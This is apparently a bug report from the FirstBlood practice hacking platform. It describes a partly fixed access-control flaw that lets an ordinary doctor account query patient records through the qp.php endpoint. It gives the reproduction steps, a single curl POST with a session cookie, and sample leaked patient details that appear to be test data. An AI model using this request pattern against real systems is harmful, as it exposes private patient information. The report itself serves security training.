FirstBlood-#918 — A normal doctor still can access /drpanel/drapi/qp.php and search patients via a POST request
This issue was discovered on FirstBlood v2
On 2021-10-30, panya Level 7 reported:
Steps to reproduce:
- Register a doctor (e.g. with name
testas an invitation code).
- Login as the doctor with the credentials provided at step 1.
drpscookie session value (
d8e66390655b44c158fac363ain our case) and paste in an request like this:
curl -X POST 'https://73ba26106566-panya.a.firstbloodhackers.com/drpanel/drapi/qp.php' -H 'Cookie: drps=d8e66390655b44c158fac363a' -d 'name=a'
This information about patients will be displayed:
Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Sean zseano<br>Address: 53 Barkly Rd, Leeds, LS11 7ER<br>Telephone: 01394 389182<br>DOB: 13/03/37<hr>Name: Jane Hugo<br>Address: Office 310, 83, Baker St, London, W1U 6AG<br>Telephone: 020 7034 7011<br>DOB: 05/07/1989<hr>Name: Melissa White<br>Address: St. Johns Hall, Breck Rd, Poulton-Le-Fylde, FY6 7HT<br>Telephone: 07796 985353<br>DOB: 02/01/1992<hr>
A newly created doctor should not be allowed to use the
/drpanel/drapi/qp.phpendpoint and search patients information.
FirstBlood ID: 40
Vulnerability Type: Application/Business Logic
The endpoint qp.php use to respond to GET requests and it should only allow administrators to query for patient information however the developers only fixed the bug partially and it still allowed for doctors to query for patient information. query.php is related to this file and in v1 allowed for Doctors and admins, but query.php was fixed completely whereas qp.php was not.